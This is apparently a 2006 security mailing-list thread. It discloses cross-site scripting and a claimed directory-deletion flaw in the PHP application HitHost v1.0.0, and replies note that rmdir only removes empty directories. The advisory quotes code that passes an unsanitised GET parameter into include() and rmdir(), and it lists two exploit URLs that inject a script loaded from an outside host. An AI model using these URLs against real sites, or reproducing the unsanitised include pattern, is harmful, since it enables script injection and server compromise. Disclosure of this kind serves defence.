Re: histhost v1.0.0 xss and possible rmdir
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system call] both say that the directory must be empty (ie, have no entries other than "." or ".."). rmdir(2) should fail and errno should be set to ENOTEMPTY if the directory is not empty. On 3/14/06, Steven M. Christey <[EMAIL PROTECTED]> wrote: > > retard said: > > >as you see line 19 raises suspision of the possibility of rming 0777 > >dirs i've tried it on on my personal server with no sucess, if someone > >knows of a way let me know. > > According to the PHP manual, rmdir only works on empty directories. > Did you try to remove an empty directory? > > - Steve > -- GDB has a 'break' feature; why doesn't it have 'fix' too?
Re: histhost v1.0.0 xss and possible rmdir
retard said: >as you see line 19 raises suspision of the possibility of rming 0777 >dirs i've tried it on on my personal server with no sucess, if someone >knows of a way let me know. According to the PHP manual, rmdir only works on empty directories. Did you try to remove an empty directory? - Steve
histhost v1.0.0 xss and possible rmdir
summary software: HitHost vendors website: http://daverave.64digits.com/index.php?page=hithost versions: <= 1.0.0 class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: medium description hithost uses $_GET variables in crucial parts of their code causing xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded to 0777 in ./admin/deleteuser.php: 15 else 16 { 17 unlink("users/$deleteuser/password.php"); 18 unlink("users/$deleteuser/counter.php"); 19 rmdir("users/$deleteuser/"); 20 echo "The user $deleteuser has been deleted"; 21 } as you see line 19 raises suspision of the possibility of rming 0777 dirs i've tried it on on my personal server with no sucess, if someone knows of a way let me know. in ./admin/viewuser.php: 6 $viewuser = $_GET['user']; 7 include("users/$viewuser/counter.php"); 8 echo "Username: $viewuser"; 9 echo "Number of counter hits: $hits"; this code is self explanitory, the script does not sanitise the $_GET['user'] allowing users to easily shove xss into the variable. exploit(s) http://example.com/admin/deleteuser.php?user=http://notlegal.ws/xss.js> http://example.com/admin/viewuser.php?hits=http://notlegal.ws/xss.js> credit author(s): retard email: [EMAIL PROTECTED]